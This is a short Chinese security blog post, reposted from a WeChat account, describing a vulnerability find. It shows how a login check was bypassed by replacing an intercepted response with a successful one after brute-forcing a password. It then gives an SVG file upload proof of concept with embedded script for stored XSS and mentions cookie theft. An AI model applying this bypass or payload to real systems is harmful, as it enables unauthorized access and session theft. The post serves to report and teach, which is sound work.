逻辑绕过+文件上传造成XSS

admin 2024年8月9日16:52:17评论12 views字数 650阅读2分10秒阅读模式

 

文章内容

昨天带着

逻辑绕过+文件上传造成XSS

以111111为账号,对密码进行爆破,任意选择一个返回包statusCode参数为200的包,将响应头及响应体进行替换到刚才抓到的登录的返回包里,一直放包,得以绕过机制认证,获取到账号权限

逻辑绕过+文件上传造成XSS

逻辑绕过+文件上传造成XSS

访问

https://x.x.x.x/app.Client/index.jsp?m=client&c=Complain&a=showComplain&mainTypeId=2

,最下面有上传文件的地方,上传svg文件,POC为

<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /><script type="text/javascript">alert("SVG XSS");</script></svg>

可实现弹出控制台打印,或者跳转

逻辑绕过+文件上传造成XSS

拼接返回文件路径,造成弹窗,可获取用户cookie

逻辑绕过+文件上传造成XSS

正文结束

本文由学员投稿而成

原文始发于微信公众号(湘安无事):【漏洞挖掘】逻辑绕过+文件上传造成XSS

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月9日16:52:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   逻辑绕过+文件上传造成XSShttp://cn-sec.com/archives/3044928.html

发表评论

匿名网友 填写信息